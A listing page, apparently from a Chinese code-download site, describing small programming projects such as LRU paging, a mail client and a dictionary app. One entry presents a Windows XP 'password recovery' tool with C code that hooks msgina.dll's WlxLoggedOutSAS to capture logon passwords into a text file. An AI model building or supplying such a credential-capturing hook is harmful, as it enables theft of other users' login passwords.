-
哲学家吃饭问题解决
哲学家吃饭问题解决-philosopher food problem solving
- 2022-01-22 16:27:13下载
- 积分:1
-
TC下的一个小型的图形处理函数库,可以参考一下
TC下的一个小型的图形处理函数库,可以参考一下-TC of a small library of graphics processing, you can refer to
- 2022-03-18 12:05:11下载
- 积分:1
-
执行程序时,当主存没有可用页面时,为了选择淘汰主存中的哪一页面,腾出1个空闲块以便存放新调入的页面。淘汰哪个页面的首要问题是选择何种置换算法。该程序采用LRU方...
执行程序时,当主存没有可用页面时,为了选择淘汰主存中的哪一页面,腾出1个空闲块以便存放新调入的页面。淘汰哪个页面的首要问题是选择何种置换算法。该程序采用LRU方法选择,依置换策略选择一个可置换的页面并计算它们的缺页率以便比较。
-implementation procedures, when the main pages can be no deposit, in order to choose out of the main deposit which pages, spare a spare block transferred to the new store pages. Which pages out of the first problem is the choice of replacement algorithm. The program LRU Methods, according to choose a replacement strategy may replacement pages and calculation of their missing pages rate to facilitate comparison.
- 2022-05-25 18:24:45下载
- 积分:1
-
原型窗口,可以基于该包开发仿真的windows桌面系统UI。
原型窗口,可以基于该包开发仿真的windows桌面系统UI。-Prototype window, can be based on the development of simulation package windows desktop UI.
- 2022-01-30 10:57:14下载
- 积分:1
-
电子邮件客户端发送和接受
163的邮件服务器配置信息:
POP3接收邮件服务器:POP.163.COM SMTP发送邮件服务器:SMTP.163.COM
yahoo的邮件服务器配置信息
接收邮件服务器是pop.mail.yahoo.com.cn 发送邮件服务器是smtp.mail.yahoo.com
126的邮件服务器配置信息
接收邮件服务器是pop.126.com, 发送邮件服务器是smtp.126.com。
新浪网站的邮件服务器配置信息
接收邮件服务器是pop3.sina.com.cn, 发送邮件服务器是smtp.sina.com.cn。
vc6.0,可直接运行。
- 2022-01-24 14:00:46下载
- 积分:1
-
应用c++开发的n的阶乘的程序
应用c++开发的n的阶乘的程序-application development n factorial procedure
- 2023-05-22 03:00:03下载
- 积分:1
-
案例3计算平台长度程序
案例3计算平台长度程序-computing platform length procedures
- 2022-11-23 19:25:03下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
a particular type or format of ppt,esp. for tables.
a particular type or format of ppt,esp. for tables.
- 2023-07-26 08:00:03下载
- 积分:1
-
用vc做的英语辞典,可以进行单词的查找,删除,添加,用ADO数据库进行的连接。本程序可以作为学习vc的结业程序,建议四天内做完。...
用vc做的英语辞典,可以进行单词的查找,删除,添加,用ADO数据库进行的连接。本程序可以作为学习vc的结业程序,建议四天内做完。-vc do with the English dictionary, the word can identify, delete, add, ADO database connectivity. The procedure can be used as learning vc exit procedures, the proposed four days to finish.
- 2022-08-20 19:23:18下载
- 积分:1